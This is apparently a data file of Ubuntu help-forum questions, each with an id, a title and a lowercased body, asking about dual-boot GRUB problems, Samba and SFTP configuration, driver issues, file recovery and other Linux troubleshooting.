489854	command-line program to manage trackpoint speed , sensitivity , etc ... without restarting session	i am on ubuntu 14.04 and thinkpad t520 . this solution works to set values after a restart , but i would like to be able to set and get the values on the fly . note : i already made a bash script to do this after some fruitless research , so i am creating this question in case it helps anyone else .
489857	grub menu not showing after exiting bios	so i 've dual booted windows 8.1 and ubuntu 14.04 on a uefi system . so far i 've been able to switch oss from the grub menu at the boot screen , which shows entries for both . recently , i tried to run android emulator , genymotion specifically , in ubuntu . after all was done , i needed to enable intel virtuialization technology from my bios , which i did . but after saving my changes and exiting bios , my laptop now boots straight into windows 8.1 without showing the grub menu . i know i can get the grub menu back if i go on and re-install ubuntu again , but i really do n't want to go down that path . my boot mode is set to uefi , and changing it to legacy mode did not bring the grub menu back . my windows bootloader and grub are installed on seperate partitions , if that helps . so , what am i missing here ? please help me out .
489858	installation of automatically tuned linear algebra software , generic static	while installing atlas from here . i am facing this problem : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . i do n't know how to go about resolving it .
489859	which is better , `` install ubuntu alonside windows '' or `` something else ''	i just downloaded the latest version of ubuntu ( 14.04 ) and before im doing the installation through usb i want to know , which way is better ; i already have a win7 so and want to keep it , i saw a lot of tutorials but mostly of them tell me to do manually for the partitions . why they prefer in that way ?
489861	can i share a host process with linux container ?	on my ubuntu 12.04 host , i have created a linux container p2 . on the host i have nginx installed and running . my question - can i share the running nginx on host with one or more linux container ? by sharing i am referring to - process/config/data etc . i want to share as much as i can . would be great if i could start n containers without having to install nginx on each , and still run n instances of nginx through these containers . if yes , please share how to do so ?
489862	how to install boot repair tool in ubuntu 14.04 live ?	i am not able to install boot repair tool via terminal . i have tried many commands.. not working ...
489863	is there a way to configure all files in a folder using a particular software ?	im using opensmile software to extract features from an audio file . my work involves extracting mfcc featues from a .wav file ( to obtain a .mfcc file ) . default code to convert the file is as follows : ./smilextract -c config/mfcc12_e_d_a.conf -i input.wav -o output.mfcc.htk this step involves converting one file at a time . is there a way to convert all the files in a folder simultaneously ? i have to convert some 2500 files . please help .
489865	blinking cursor when installing latest ubuntu 32 bit	i there . i am trying to install ubuntu 32 bit on my pc . i get to the screen where you can choose to install on its own or along side windows . i chose clean install , then just get a blinking underscore . can anybody assist with this please ?
489866	quick format of usb drive or external hdd	i remember that in order versions of ubuntu , there was a gui option for quick format of flash drive . i am looking for a gui app to format usb drive with one-click . a simple app to take care of partitioning , filesystem , etc rather than advanced ones such as gparted .
489867	how to install ubuntu 14.04 when mint is currently installed	linux mint 16 cinnamon 32 bit cinnamon version 2.0.14 linux kernel 3.11.0-20-generic is it possible from terminal ?
489868	i have a problem with my desktop	there 's something wrong with my desktop . yesterday , i was using my laptop ( toshiba satellite l655 ) as usual . i have ubuntu 14.04 lts installed , and everything was ok . i never had any problem before . but today , when i woke up and turned on my laptop and logged in to my account , it displayed nothing except for the background . no menu , files , nothing . it just shows the background . please help me . thanks .
489872	xampp suddenly requesting 32bit libs	xampp was working perfectly until yesterday . but now it tells me : xampp is currently only availably as 32 bit application . please use a 32 bit compatibility library for your system . this is very strange , because it was working without problems . i do n't know exactly what happened ! anyway , i was about to install 32bit libs but found them no longer available . something maybe related to the issue , today i was trying to install composer dependency manager but failed . also yesterday i did semi update to my system . ubuntu 14.4 64 bit xampp 1.8.3-4
489873	can not save document to usb	unable to save any openoffice documents to usb . can not export any picasa pictures to external hard-drive either . message says : error saving the document ... .. does not exist . ... . is file name
489880	recordmydesktop exited with status 3204 : can not connect to x server	i 'm trying to do a recording of my screen under ubuntu 14.04 ( unity ) with recordmydesktop . i 'm posting here screenshots of its config . also , i 'm using dual monitor , and i want to select only one . so i selected it `` as window '' . i tried giving the display as a command line argument , same result . i tried running as root , same result : `` can not connect to x server '' . and , this is what happens every time :
489883	i have tried to install the linconnectserver on my ubuntu 13.10 and i cant install it	i have tried installing the linconnectserver on my ubuntu 13.10 and it failed to install . i have tried it in two ways . the first method is by using the direct commands given in the https : //github.com/hauckwill/linconnect-server/ github page . the second method i tried is that i have downloaded the zip file and extracted it.i have run the install.sh file in the terminal but i couldnt succeed in the installation . moreover i went in to the main directory and i have run the linconnect.py file but itis also of no use . please help
489888	where should i look to diagnose login freezing ?	my ubuntu 14.04 installation freezing on login screen time to time before i touch keyboard or mouse . it can be freeze again on the next boot when i reset the machine . if i am lucky , it is not freeze on first boot . where should i look and what should i investigate to solve those freezes ? i 've looked at this question and its answers : what should i do when ubuntu freezes ? i 'm not looking for how to reset my computer if everything is stopped working . i also know that sysreq tricks . i 'm looking for how to diagnose this issue .
489892	scalpel recovers rar file but the recovered file is very small in size	i am using scalpel to recover an accidently deleted rar file which is 476 mb in size . i have the following config setting to recover rar files : rar n 10000000000000000000 rar ! and running the following command : sudo scalpel /dev/sda1 -o ./recovered/ it shows the following result : scalpel version 1.60 written by golden g. richard iii , based on foremost 0.69 . opening target `` /dev/sda1 '' image file pass 1/2 . /dev/sda1 : 100.0 % |*********************************************************| 476.0 mb 00:00 etaallocating work queues ... work queues allocation complete . building carve lists ... carve lists built . workload : rar with header `` \x52\x61\x72\x21 '' and footer `` '' -- > 1 files carving files from image . image file pass 2/2 . /dev/sda1 : 100.0 % |*********************************************************| 476.0 mb 00:00 etaprocessing of image file complete . cleaning up ... done . but when i browse the recovered folder as root and check the size of the recovered rar it says it is only 42.1 mb in size . how can i recover the whole rar file ? please help .
489894	how do i set up sftp file access logging for openssh ?	i have an sftp setup using the built-in sftp-subsystem of openssh with chrooted users . in the old days when i used to use ftp , i was able to see what files were accessed by users in the logs . how do i achieve the same using openssh/sftp ? relevant parts of my /etc/ssh/sshd_config : subsystem sftp internal-sftp match group sftponly chrootdirectory /home/ % u x11forwarding no allowtcpforwarding no forcecommand internal-sftp
489899	boot-repair can not purge grub	i have been using ubuntu for some years now and never looked back . unfortunately my new job requires me to install windows . to prevent me from braking my ubuntu install i bought a new hdd and unplugged the old ones . installed windows 8.1 and everything seemed fine . when i plugged the old hdd 's back the option to boot into windows was not there . after searching for a while i decided to intsall boot-repair in ubuntu 14.04 and do a recommended repair . after running a while i the gui tells me to run the following commands : sudo dpkg -- configure -a sudo apt-get install -fy sudo apt-get purge -y -- force-yes grub* shim-signed linux-signed* when running those commands i get the following error : sudo apt-get purge -y -- force-yes grub* shim-signed linux-signed* no matches for wildcard 'grub*' and when i click forward in boot-repair it says : grub is still present . what commands should i run to remove grub ?
489902	grub not loading other operating systems	a few days ago i have dual booted ubuntu 12.04 with windows xp . however if i start the computer up , it directly loads ubuntu 12.04 , while i want to be able to run xp as well , i do n't get to see which operating system i want to start up . fdisk -l returns : device boot start end blocks id system /dev/sda1 63 29559599 14779768+ 7 hpfs/ntfs/exfat /dev/sda2 * 29566976 381650980 176042002+ 7 hpfs/ntfs/exfat /dev/sda3 381652990 625141759 121744385 5 extended /dev/sda5 381652992 619374591 118860800 83 linux /dev/sda6 619376640 625141759 2882560 82 linux swap / solaris disk /dev/sdb : 2103 mb , 2103443456 bytes 65 heads , 62 sectors/track , 1019 cylinders , total 4108288 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x73736572 this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 1920221984 3736432267 908105142 72 unknown /dev/sdb2 ? 1936028192 3889681299 976826554 6c unknown /dev/sdb3 ? 0 0 0 0 empty /dev/sdb4 27722122 27722568 223+ 0 empty is there a way to get grub fixed and have windows xp running as well ? regards .
489903	how to automatically copy pictures with resizing to some directory ?	i 'd like to share some pictures with someone using dropbox . however , i 'd prefer to downgrade the resolution of them ( they will only be viewed on screen on the other side , so there 's no need for big resolutions ) . i can resize them easily with imagemagick 's convert and sync them to some folder in ~/dropbox using rsync , but i 'd like to combine these features . my dream workflow looks like this : i copy the images to , say , ~/to-share , the new ( and only new ! ) files are automatically converted with downgrading the resolution to ~/dropbox/to-share . a less ideal solution includes running some script to do the syncing ( after copying ) . does there exist anything like that ?
489905	how to format a usb drive for startup disk ?	i want to make a bootable live usb from ubuntu 14.04 . when i insert a free usb , startup disk creator says capacity : 7.5gb ; free 0.0gb . this is a free and working usb , as i can copy file on it . i tried to format it several times with gparted and disk , but still the same result . when i hit erase in startup disc creator , it gives the following error : org.freedesktop.dbus.python.gi._glib.gerror : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/dbus/service.py '' , line 707 , in _message_cb retval = candidate_method ( self , *args , **keywords ) file `` /usr/share/usb-creator/usb-creator-helper '' , line 239 , in format block.call_format_sync ( 'dos ' , glib.variant ( 'a { sv } ' , { 'erase ' : glib.variant ( 's ' , '' ) } ) , none ) gi._glib.gerror : gdbus.error : org.freedesktop.udisks2.error.failed : error synchronizing after initial wipe : timed out waiting for object how can i safely format and create a live usb ?
489906	realtek rtl8192ee wifi card not working after installing kernel 3.16 rc2	i followed suggestions on this thread and installed kernel 3.16 rc2 . now my ubuntu has successfully detected the wifi card and i am able to connect to my router . i also see that packages being transferred in system monitor . however , i still can not access any webpage using firefox . any help ? edit : ubuntu 14.04 thinkpad t440 lshw shows rtl8192ee pcie was unclaimed before installing new kernel .
489907	ubuntu 14.04 frequent mouse freeze	i recently installed ubuntu 14.04 alongside windows 7 on my asus ( i5 core and 8gb ram ) since ubuntu is more and more growing on me . however i experience frequent freezes of my screen . i can not move the mouse , but i can use the keyboard . when it happens i could always open a command line with ctrl+alt+f2 and do sudo service lightdm restart to restart graphics . but that of course does not fix the problem and is rather annoying since it happens rather often . i would appreciate some ideas/tips on how i can find and fix the underlying issue here . greets and thanks in advance
489911	14.04 battery died during apt-get upgrade	i did my daily apt-get update and upgrade , but i forgot to plug in my laptop to a power source and battery died during upgrade . after pluging in and turning laptop on everything froze . so now ubuntu 14.04 wont load . it stops at loading logo . is there anything i could do ?
489912	thinkpad does not wake from sleep - 14.04	on a freshly installed and updated ubuntu 14.04 my thinkpad e540 suspends successfully , but wo n't wake back up - a full reboot is necessary . moreover , during the suspended state the fan is constantly working on considerably higher rpm than during normal usage , even though laptop 's led indicates sleep . however , it seems that both hardware and bios are ok , since suspend works fine on windows 7 . i tried out solutions offered on similar problems , most notably this ( use nvidia proprietary drivers instead of noveau ) and this , yet the problem persists . pm-suspend.log reports everything was completed with success , except this : failed to connect to non-global ctrl_ifname : ( null ) error : no such file or directory this message is repeated thrice . the log ends with 'performing suspend ' . i really appreciate help with this matter . edit : this procedure also did n't help .
489914	ubuntu 14.04 network problem	i have an issue with my ubuntu 14.04 . i am able to connect to wireless networks without any problems , but when i am in my dorm room , i can not connect to my wired internet connection . it works fine under windows by just using dhcp settings , but it does not seem to be working under ubuntu . it just says that it has no connection . any ideas ? results for ifconfig -a eth0 link encap : ethernet hardware adresse f4:6d:04:1f:7d:69 up broadcast multicast mtu:1500 metrik:1 rx-pakete:40 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:28 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:5370 ( 5.3 kb ) tx-bytes:5511 ( 5.5 kb ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:4804 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:4804 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:403965 ( 403.9 kb ) tx-bytes:403965 ( 403.9 kb ) wlan0 link encap : ethernet hardware adresse 48:5d:60:95:45:2d up broadcast multicast mtu:1500 metrik:1 rx-pakete:952361 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:527740 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:1424038871 ( 1.4 gb ) tx-bytes:61999960 ( 61.9 mb ) and netstat -rn kernel-ip-routentabelle ziel router genmask flags mss fenster irtt iface this is when my laptop has the ethernet cable connected . i just get the same message i would get if i had the cable disconnected . so i do net even get an ip adress from dhcp server . the results posted are without wireless connected , since i only have a wired connection in my dorm room .
489917	ubuntu juju local configure failed	when i run bootstrap in how do i configure juju for local usage ? i got this error . i have done the same steps . so why that error is comming ? then i checked the permission for index.json file i changed permission but it did n't work . error failed getting all instances : error executing `` lxc-ls '' : traceback ( most recent call last ) : ; file `` /usr/bin/lxc-ls '' , line 31 , in < module > ; import lxc ; file `` /usr/lib/python3/dist-packages/lxc/__init__.py '' , line 26 , in < module > ; import _lxc ; importerror : /usr/lib/x86_64-linux-gnu/liblxc.so.1 : undefined symbol : cgmanager_get_pid_cgroup_abs_sync error error executing `` lxc-ls '' : traceback ( most recent call last ) : ; file `` /usr/bin/lxc-ls '' , line 31 , in < module > ; import lxc ; file `` /usr/lib/python3/dist-packages/lxc/__init__.py '' , line 26 , in < module > ; import _lxc ; importerror : /usr/lib/x86_64-linux-gnu/liblxc.so.1 : undefined symbol : cgmanager_get_pid_cgroup_abs_sync error bootstrap failed , and the environment could not be destroyed : exit status 1 error rename /home/sajith/.juju/local/storage/.tmp/juju-filestorage-670557739 /home/sajith/.juju/local/storage/tools/streams/v1/index.json : permission denied these are the steps i followed : sudo add-apt-repository ppa : juju/stable sudo apt-get update sudo apt-get install juju-core sudo apt-get install juju-local ssh-keygen -t rsa juju init juju switch local juju bootstrap error error executing `` lxc-ls '' : traceback ( most recent call last ) : ; file `` /usr/bin/lxc-ls '' , line 31 , in < module > ; import lxc ; file `` /usr/lib/python3/dist-packages/lxc/__init__.py '' , line 26 , in < module > ; import _lxc ; importerror : /usr/lib/x86_64-linux-gnu/liblxc.so.1 : undefined symbol : cgmanager_get_pid_cgroup_abs_sync
489918	require the link for . jar file used by sql anywhere 16	i wish to download ultralitejni16.jar so that i can sync by sql anywhere 16 on an android device . i am unable to find the jar , and sql anywhere 16 is available only on linux for which the jar is in some other format . can someone please provide me with a link to download it ?
489919	how to disconnect file location from onedrive-d	i have just installed onedrive-d to my computer . after installing , it asked me if i want to sync files with some kind of folder . for some reason , choosing the folder i did n't want to sync until i have every file which was in that file on onedrive . and it is like 200gb of data in that folder . how can i disconnect that folder from onedrive , that it would not sync from that folder anymore ? i did reinstlled it and synced the folder i want now , but i have most of my files from previous folder there as well . thank you
489922	remove command not working	rm command not working.when i type command rm file name it giving me error no command 'trash ' found , did you mean : command 'crash ' from package 'crash ' ( main ) command 'ktrash ' from package 'kde-runtime ' ( main ) trash : command not found
489926	a folder suddenly disapearred	today when i download something at website , suddenly jump a tag , ask me there is a problem about ubuntu system , whether continue , i click continue button , then i find my download folder disappear . i do n't know what 's happen , i restart system . my download folder completely disapear , how i can recovery it . it include many data thank you
489928	adt bundle installation issue	hello all , i 've downloaded the zip file containing the eclipse adt bundle . how ever , after unpacking the file and executing the ' eclipse.exe ' file i get an eclipse juno splash screen instead of the expected adt splash screen . i thought that was n't a big deal so i went ahead with checking out the development environment . i found out that it does n't consist of the standard options and user interface one expects in the adt bundle . also , the 'r.java ' file is n't being generated after importing an existing project ( everything 's fine with the project , the layouts , resources etc ) . i 've downloaded open jdk java 7 and also the necessary libraries ( libgl1-mesa-dev : i386 ) as per the installation steps given in this post : complete installation guide for android sdk / adt bundle on ubuntu
489929	delete ubuntu from dual boot windows 8.1 in gpt disk	i 'm using windows dual booting with ubuntu . i have uninstalled , and at that time my disk was formated as mbr . after deleting all partitions of ubuntu i choose to rebuild the mbr in my disk . that way i was sure not to loose the windows boot loader . now i 'm using a gpt disk . i want to delete ubuntu but i 'm scared i will loose my windows boot loader .
489933	how to come out of root user ?	i just gained root access following steps from the http : //www.wikihow.com/become-root-in-ubuntu . my prompt get changed from $ to # sign , indicating i have root access . now i have come out or log out or disable root access . for that i tried sudo passwd -dl root . then it shows the message passwd : password expiry information changed . but i still have root access , and i am still having # sign instead of $ . root @ hostname : ~ # still appears instead of xyz @ hostname : ~ $ . expecting kind and fast reply . thanks .
489936	huawei e3531 : view signal strength ?	i have a huawei e3531 3g dongle ( which works fine on ubuntu 14.04 , right out of the box ) . however , it registers as an usb-ethernet adapter and i ca n't view any signal strength or other connection information except by visiting the dongle 's internal webpage at 192.168.8.1 . can this dongle also be used as a ttyusbx modem device so it works properly with network-manager ? thanks ! florian
489941	permission denied running perl	perl 5.18.2 was running fine on my ubuntu 14.04 system until i needed a package from cpan which did not exist as an ubuntu package . i installed it as root and it did n't work but then the installation process seems to have changed permissions of something . now , i can not run perl as a normal user . as a normal user , `` perl -v '' works . but `` perl -v '' gives me this : $ perl -v ca n't locate config.pm : permission denied . begin failed -- compilation aborted . if i run it under sudo , then it works : $ sudo perl -v ... @ inc : /etc/perl /usr/local/lib/perl/5.18.2 /usr/local/share/perl/5.18.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 /usr/local/lib/site_perl . indeed , config.pm exists in /usr/lib/perl/5.18 and its permissions are readable by normal users . so , something has switched to root and i do n't know what has . has anyone seen this before and know what i should be looking for ? out of desperation , i even uninstalled perl and reinstalled it back . did n't work . though something funny ... after uninstalling , i still had a /usr/bin/perl executable . not sure if that is related ... any help would be appreciated ! ray
489951	how to remove duplicate imported photos in shotwell	i 've noticed that shotwell has imported many images twice . apparently the duplicate detection is buggy once a photo is tagged . i have `` write meta data tags '' enabled in the settings . if i import a photo test-images.jpg and add tags to it it will not be picked up upon another import of the same file . the second file will be named test-images-1.jpg and placed in the library folder as per the active rules ( not necessarily into the same folder ) . test-images.jpg and test-images-1.jpg will have the same image data but due to the added tag/metadata the files are not the same anymore and wo n't be picked up by searching for duplicates ( e.g . md5 hash ) . using a file name based search would be possible but i ca n't exclude that i have not imported a file ending with -1 to which was not imported as a duplicate . how can i clean up my photo library ? i tried to use the search function in shotwell but with more than 1000 photos there must be a better , simpler way . i 'm not to worried about tags getting lost , typically the second import ( the duplicate ) has no tags applied .
489953	i got a error , when i start my computer	i am getting this type of problem , when i open my computer ( continue to wait or press s to skip mounting or m for manual recovery ) please help me regarding this
489955	very strange view duplication after update	after i 've installed latest updates there 's a great issue with the rendering of my gui.all applications become unusable after startup , due to a view-duplication ( even before login ) . i tried a lot , also reverting to a snapshot and did the updates again and also reinstalleted latest vmware-tools and drivers , but it did n't change anything in the behaviour ( except the snapshot rollback ; ) ) . the configuration is with just one screen so it 's very strange ... have you an idea which package is causing this error and/or how i can fix it ? it 's a development machine and there have been many work after the snapshot , also configurations , it would take days to get the configurations and the datastorage to an actual state from backups and by file copies from the damaged state . -- version of ubuntu is 12.04.4 lts -- update -- i already tried to add screenshots , but i 'm not allowed cause it 's my first post here . i 'll try to explain what `` duplication '' means in this case : -there is a `` mirror '' line in the middle of the screen where all objects ( all the desktop objects of the environment and the side/command bar ) and also new started applications are rendered '' mirrored '' . -except the mouse-pointer , so the objects of all `` same '' or `` unique '' looking desktops/environments are `` personal '' accessible , but are responding `` synchronised '' / '' mirrored '' . -all evironments are not full visible , the `` mirror '' line cuts the view in the half of the screen . -if you change the screen to higher definition ( f.e . 1920 x 1080 ) , the screen is getting a third `` mirror line '' and a third mirrored ( from the first ) environment . the whole desktop objects and applications are then rendered `` trippled '' but `` personal '' accessible . -from a developer perspective , there is a strange effect which is pointing the failure out of vmware : you can access the system menu to logout or shutdown the ubuntu only in the right upper corner of the whole screen . even if it 's not visible cause overlapped by the other '' views '' . -if the graphic-system of vmware would cause this error , it should only cause strange view effects or things like mirroring or thomthing else . i think no logical strange things `` inside '' the software specific logic like that , can be caused by the virtual `` hardware '' in this case .
489959	setting up a samba share with guest access	i am trying to setup guest access to a samba share but am getting nowhere . i have had to purge samba multiple times . here is my smb.conf : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # server role . defines in which mode samba will operate . possible # values are `` standalone server '' , `` member server '' , `` classic primary # domain controller '' , `` classic backup domain controller '' , `` active # directory domain controller '' . # # most people will want `` standalone sever '' or `` member server '' . # running as `` active directory domain controller '' will require first # running `` samba-tool domain provision '' to wipe databases and create a # new domain . server role = standalone server # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # # the following settings only takes effect if 'server role = primary # classic domain controller ' , 'server role = backup domain controller' # or 'domain logons ' is set # # it specifies the location of the user's # profile directory from the client point of view ) the following # required a [ profiles ] share to be setup on the samba server ( see # below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes username map = /etc/samba/smbusers security = user ; encrypt passwords = yes guest ok = yes ; guest account = nobody # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home directory as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . # un-comment the following parameter to make sure that only `` username '' # can connect to \\server\username # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin [ downloads ] path = /media/me/3tb/downloads writeable = yes ; browseable = yes guest ok = yes
489963	what does shotwell do when i move photos inside the photo directory	i have enabled 'watch library directory for new files ' and imported many photos with the settings < lib > / < year > / < month > / < day > / < .. > . i have since decided to move to < lib > / < year > / < month > / < .. > and would now like to clean up the old folders . can i simply move the files into the month folder and shotwell will pick it up and fix it ?
489964	i have a cd to upgrade to windows 8.1 . is it safe ?	i brought a cd to upgrade my windows 7 to 8.1 pro , i use windows 7 alongside ubuntu on my pc . so if i proceed with the upgrade will the grub get damaged or only the windows 7 erases and 8.1 gets installed ?
489965	use backblaze online backup with ubuntu	i 've read good things about backblaze but unfortunately they do n't seem to support linux/ubuntu . is not supporting linux by backblaze maybe not providing a nice gui and it is still possible to use it for backup ?
489966	read from text file in qml qt/quick	i have a program to preview images that store every image 's path ( all images are in my computer ) in text file . first i open text file and read line by line images paths and store to a list then i source image to the list [ i ] , ( for i=0 to numbers of images ) . it returns to me some error like this : qml image : can not open : qrc : ///d : /qtapp/gui_qml_app/res/1.png % 0d directshowplayerservice : :doseturlsource : unresolved error code 800c000d this is my text file : file : /d : /qtapp/gui_qml_app/res/1.png file : /d : /qtapp/gui_qml_app/res/2.png file : /c : /users/info/desktop/wall_images/3.png and this is my code : property int i : -1 var request = new xmlhttprequest ( ) request.open ( 'get ' , 'in.txt ' ) request.onreadystatechange = function ( event ) { if ( request.readystate == xmlhttprequest.done ) { list = request.responsetext.split ( '\n ' ) ; } } request.send ( ) item.source =string ( list [ i+1 ] ) i++ ; can every one help me ?
489967	explaination of my `` efibootmgr -v '' output	i am trying to ascertain where the efi boot records are located on my lenovo u41o by using the command sudo efibootmgr -v. can someone explain it to me ? $ sudo efibootmgr -v bootcurrent : 0008 timeout : 0 seconds bootorder : 0010,0003,0004,0005,0006,0008,0007,0009,000a,000b,001d boot0000 setup boot0001 boot menu boot0002 diagnostic splash boot0003* ata hdd2 : wdc wd5000lpvt-08g33t1 acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00010000000000..byvd.a ... o.*.. boot0004* ata ssd1 : sandisk ssd u100 24gb acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00000000000000..byvd.a ... o.*.. boot0005* raid device2 : 030a2500d23878bc820f604d8316c068ee79d25ba5388f9ca46ace40bf2f0ade9bc05d6d01 boot0006* raid device1 : 030a2500d23878bc820f604d8316c068ee79d25ba5388f9ca46ace40bf2f0ade9bc05d6d00 boot0007* atapi cd : 030a2400d23878bc820f604d8316c068ee79d25baea2090adfde214e8b3a5e471856a354 boot0008* usb hdd : sandisk cruzer edge acpi ( a0341d0,0 ) pci ( 1a,0 ) usb ( 0,0 ) usb ( 0,0 ) 3. ! ..3.g..a ... .. boot0009* usb fdd : 030a2400d23878bc820f604d8316c068ee79d25b6ff015a28830b543a8b8641009461e49 boot000a* usb cd : 030a2400d23878bc820f604d8316c068ee79d25b86701296aa5a7848b66cd49dd3ba6a55 boot000b* pci lan : efi network ( ipv4 ) acpi ( a0341d0,0 ) pci ( 1c,1 ) pci ( 0,0 ) mac ( 089e01381698,0 ) ipv4 ( 0.0.0.0:0 < - > 0.0.0.0:0,0 , 0x.j.+*.n ... ..=8 . boot000c* lenovo recovery system acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00010000000000hd ( 3,276800,1f4000,26c6992a-07b8-43bc-98b8-d8c83e64db3b ) file ( \efi\microsoft\boot\lrsbootmgr.efi ) boot0010* windows boot manager hd ( 2,1f4800,82000,72931328-061b-42e0-8fd8-8a5ac7775074 ) file ( \efi\microsoft\boot\bootmgfw.efi ) windows ... ... ... x ... b.c.d.o.b.j.e.c.t.=. { 